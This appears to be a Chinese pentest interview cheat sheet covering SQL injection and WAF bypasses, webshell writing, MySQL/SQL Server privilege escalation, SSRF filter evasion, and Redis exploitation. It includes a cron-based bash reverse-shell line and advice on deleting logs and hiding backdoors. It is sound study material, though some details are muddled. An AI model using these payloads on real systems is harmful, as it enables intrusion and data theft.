网络安全领域各种资源,学习文档,以及工具分享、前沿信息分享、POC、EXP分享。不定期分享各种好玩的项目及好用的工具,欢迎关注。
目录
SQL注入过滤单引号怎么绕过 mysql报错注入常用函数 报错注入绕WAF mysql写文件函数 into outfile使用有哪些限制 mysql提权 SQL server除了SQL注入以外还有哪些渗透方式 SSRF原理 SSRF可以利用的协议 哪些功能点会存在SSRF漏洞 对内网IP进行过滤,有什么绕过方式 redis rce过程 redis未授权怎么获得服务器权限 redis主从复制漏洞 任意文件读取一般读取哪些文件 如何通过文件读取获得web的绝对路径 /ect/passwd 文件包含哪些内容 java 反序列化漏洞 shiro反序列化漏洞 哪些组件或者中间件存在反序列化漏洞 渗透测试一个站点的具体流程 说一个熟悉的CMS,具有哪些指纹特征 正向代理和反向代理的区别 常见端口对应服务 常见的内置用户 弱密码存在验证码如何绕过 非对称加密的加密过程
一、SQL注入过滤单引号绕过方法
- 双写单引号:
'
转为''
,可能被过滤,但部分场景可尝试' OR 1=1--
。- Hex编码:将字符串转为16进制,如
SELECT * FROM users WHERE username=0x61646D696E
。- 宽字节注入:针对GBK编码数据库,利用
%df%27
触发编码错误(%df
与反斜杠\
结合生成繁体字符)。- CHAR()函数:用
CHAR(39)
代替单引号(如SELECT CHAR(97,100,109,105,110)
对应admin
)。- 字符串拼接:如
CONCAT('a','dmin')
拼接为admin
。
二、MySQL报错注入常用函数
- updatexml():sql
触发XPath语法错误,返回查询结果。
AND updatexml(1,concat(0x7e,(SELECT user()),0x7e),1)
- extractvalue():
sql
类似AND extractvalue(1,concat(0x7e,(SELECT database())))
updatexml
,利用XML解析报错。- floor()+rand():
sql
利用主键重复报错。SELECT COUNT(*) FROM users GROUP BY concat(database(),floor(rand(0)*2))
- exp():sql
数值过大导致溢出报错。
AND exp(~(SELECT * FROM(SELECT user())a))
三、报错注入绕WAF
- 分块传输:通过HTTP分块编码绕过正则检测。
- 注释干扰:
sql
/*!50000updatexml*/(1,concat(0x7e,user()),1)
- 大小写混合:如
UpDaTeXmL()
。- 特殊符号分割:
sql
updatexml(1,concat(0x7e,user()%23),1)
- 编码混淆:使用URL编码、Unicode编码(如
%u0027
代替单引号)。
四、MySQL写文件函数
into outfile
:写入多行数据,需绝对路径和权限。sql
SELECT '<?php phpinfo();?>' INTO OUTFILE '/var/www/html/shell.php'
dumpfile
:写入二进制文件(如SSH密钥)。限制:
secure_file_priv
需为空或目标目录。- Web目录需可写且路径正确。
五、MySQL提权方式
- UDF提权:
- 上传自定义动态库(如
lib_mysqludf_sys.so
)。- 创建函数执行系统命令:
sql
CREATE FUNCTION sys_exec RETURNS INTEGER SONAME 'udf.so'
- 启动项提权:
sql
SELECT '恶意命令' INTO OUTFILE '/etc/rc.local'
- CVE漏洞利用:如CVE-2016-6662(权限配置不当)。
六、SQL Server其他渗透方式
- xp_cmdshell:启用后执行系统命令。
sql
EXEC sp_configure 'show advanced options',1; RECONFIGURE; EXEC sp_configure 'xp_cmdshell',1; RECONFIGURE; EXEC xp_cmdshell 'whoami'
- SSRS漏洞:利用Reporting Services的文件上传漏洞。
- 数据库链接攻击:通过
OPENROWSET
跨数据库查询。
七、SSRF原理与利用
- 原理:服务器端发起未验证的网络请求(如读取本地文件或访问内网)。
- 协议利用:
file://
读取本地文件(如file:///etc/passwd
)。gopher://
构造任意TCP流量(攻击Redis/MySQL)。dict://
探测端口信息。- 高危功能点:
- 在线翻译、网页截图、URL预览、XML解析(XXE)等。
八、内网IP过滤绕过
- 进制转换:
127.0.0.1
转为2130706433
(十进制)或0177.0.0.1
(八进制)。- 域名重定向:使用短域名服务或
xip.io
(如127.0.0.1.xip.io
)。- CIDR绕过:
127.127.127.127/8
。
九、Redis漏洞利用
- 未授权访问RCE:
- 写入SSH密钥:
redis
config set dir /root/.ssh config set dbfilename authorized_keys set x "\n\nssh-rsa AAAAB3N...\n\n" save
- 定时任务提权:
redis
set x "\n* * * * * bash -i >& /dev/tcp/ip/port 0>&1\n" config set dir /var/spool/cron config set dbfilename root save
- 主从复制漏洞:加载恶意模块执行命令。
十、文件读取与路径获取
- 敏感文件:
/etc/passwd
:用户列表。/proc/self/environ
:环境变量(可能含路径)。- 日志文件(如
/var/log/apache2/access.log
)。- 路径获取:
- 从PHP错误日志或
phpinfo()
中查找绝对路径。- 配置文件(如
config.php
中的__DIR__
)。
十一、反序列化漏洞
- Java反序列化:Apache Commons Collections的
InvokerTransformer
链触发RCE。- Shiro漏洞:硬编码AES密钥导致Cookie伪造(Padding Oracle攻击)。
- 常见漏洞组件:
- WebLogic(CVE-2020-14882)。
- Fastjson(自动类型推断导致的RCE)。
十二、渗透测试流程
- 信息收集:子域名、端口扫描、CMS指纹识别(如Wappalyzer)。
- 漏洞扫描:Nessus、AWVS检测SQL注入/XSS/SSRF。
- 漏洞利用:Metasploit框架、手工验证。
- 权限提升:Linux脏牛漏洞、Windows MS14-058。
- 痕迹清理:删除日志、隐藏后门。
十三、CMS指纹特征(以WordPress为例)
- 目录结构:
/wp-content/plugins/
、/wp-admin/
。- HTTP头:
X-Powered-By: WordPress
。- 默认文件:
readme.html
、wp-login.php
。
十四、正向代理与反向代理区别
正向代理 反向代理 代理客户端(隐藏客户端IP) 代理服务端(隐藏服务器IP) 用于突破访问限制(如VPN) 用于负载均衡(如Nginx)
十五、常见端口与服务
端口 服务 协议 22 SSH TCP 80 HTTP TCP 443 HTTPS TCP 3306 MySQL TCP 6379 Redis TCP
十六、弱密码绕过验证码
- OCR识别:Tesseract识别简单验证码。
- 验证码复用:同一会话重复提交。
- Burp暴力破解:设置Intruder模块跳过验证码参数。
十七、非对称加密过程(RSA)
- 密钥生成:生成公钥(公开)和私钥(保密)。
- 加密:用公钥加密明文(如
c = m^e mod n
)。- 解密:用私钥解密密文(如
m = c^d mod n
)。- 应用场景:HTTPS握手、SSH登录。